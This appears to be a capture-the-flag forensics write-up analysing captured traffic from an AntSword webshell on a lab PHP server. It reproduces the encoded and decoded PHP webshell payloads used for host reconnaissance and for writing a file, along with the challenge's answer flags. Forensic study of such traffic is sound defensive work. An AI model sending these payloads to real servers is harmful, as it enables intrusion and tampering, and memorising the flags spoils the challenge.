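Attachment link: https://caiyun.139.com/m/i?125Cm7xGHGgCs (extraction code: igym)
1. The correct password for connecting with AntSword is ______________? (Answer example: 123asd)
Solution steps
Filter on the HTTP protocol and follow the TCP streams. Going through the streams one by one, the requests to info1.php stand out as abnormal, and they reveal the AntSword connection password: it is the name of the POST parameter that carries the PHP code.
Request packet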
POST /sqlii/Less-7/info1.php HTTP/1.1
Host: 192.168.77.155
Accept-Encoding: gzip, deflate
User-Agent: antSword/v1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 744
Connection: close
6ea280898e404bfabd0ebb702327b19f=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Becho%20%22-%3E%7C%22%3B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22A%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3Becho%20%22%7C%3C-%22%3Bdie()%3B
HTTP/1.1 200 OK
Date: Thu, 03 Aug 2023 04:36:12 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
X-Powered-By: PHP/5.4.45
Content-Length: 134
Connection: close
Content-Type: text/html
->|D:/phpStudy/PHPTutorial/WWW/sqlii/Less-7 C:D:F: Windows NT CAT 5.1 build 2600 (Windows XP Professional Service Pack 3) i586 cats|<-
flag{6ea280898e404bfabd0ebb702327b19f}
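2. The value the attacker left behind is ______________? (Answer example: d1c3f0d3-68bb-4d85-a337-fb97cf99ee2e)
Solution steps
Filter on HTTP POST requests. Stream 142 contains an fwrite file-write operation, which leads to the value of the parameter 0xe9bb136e8a5e9. That value is Base64-encoded; decoding it yields the value that was written.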
POST /sqlii/Less-7/info1.php HTTP/1.1
Host: 192.168.77.155
Accept-Encoding: gzip, deflate
User-Agent: antSword/v1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 478
Connection: close
0x72b3f341e432=RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3NxbGlpL0xlc3MtNy9oYWNrZXIudHh0&0xe9bb136e8a5e9=YWQ2MjY5YjctM2NlMi00YWU4LWI5N2YtZjI1OTUxNWU3YTkxIA%3D%3D&6ea280898e404bfabd0ebb702327b19f=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Becho%20%22-%3E%7C%22%3Becho%20%40fwrite(fopen(base64_decode(%24_POST%5B%220x72b3f341e432%22%5D)%2C%22w%22)%2Cbase64_decode(%24_POST%5B%220xe9bb136e8a5e9%22%5D))%3F%221%22%3A%220%22%3B%3Becho%20%22%7C%3C-%22%3Bdie()%3B
HTTP/1.1 200 OK
Date: Thu, 03 Aug 2023 04:38:38 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
X-Powered-By: PHP/5.4.45
Content-Length: 7
Connection: close
Content-Type: text/html
->|1|<-
The data (body) portion of the POST request:
0x72b3f341e432=RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3NxbGlpL0xlc3MtNy9oYWNrZXIudHh0&0xe9bb136e8a5e9=YWQ2MjY5YjctM2NlMi00YWU4LWI5N2YtZjI1OTUxNWU3YTkxIA%3D%3D&6ea280898e404bfabd0ebb702327b19f=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Becho%20%22-%3E%7C%22%3Becho%20%40fwrite(fopen(base64_decode(%24_POST%5B%220x72b3f341e432%22%5D)%2C%22w%22)%2Cbase64_decode(%24_POST%5B%220xe9bb136e8a5e9%22%5D))%3F%221%22%3A%220%22%3B%3Becho%20%22%7C%3C-%22%3Bdie()%3B
Content after URL decoding:
0x72b3f341e432=RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3NxbGlpL0xlc3MtNy9oYWNrZXIudHh0&0xe9bb136e8a5e9=YWQ2MjY5YjctM2NlMi00YWU4LWI5N2YtZjI1OTUxNWU3YTkxIA==&6ea280898e404bfabd0ebb702327b19f=@ini_set("display_errors", "0");@set_time_limit(0);echo "->|";echo @fwrite(fopen(base64_decode($_POST["0x72b3f341e432"]),"w"),base64_decode($_POST["0xe9bb136e8a5e9"]))?"1":"0";;echo "|<-";die();
Content after Base64 decoding:
0x72b3f341e432=D:/phpStudy/PHPTutorial/WWW/sqlii/Less-7/hacker.txt&0xe9bb136e8a5e9=ad6269b7-3ce2-4ae8-b97f-f259515e7a91 &6ea280898e404bfabd0ebb702327b19f=@ini_set("display_errors", "0");@set_time_limit(0);echo "->|";echo @fwrite(fopen(base64_decode($_POST["0x72b3f341e432"]),"w"),base64_decode($_POST["0xe9bb136e8a5e9"]))?"1":"0";;echo "|<-";die();
flag{ad6269b7-3ce2-4ae8-b97f-f259515e7a91}
3. The flag the attacker downloaded is ______________? (Answer example: flag3{uuid})
Readers who are interested are welcome to take this one on.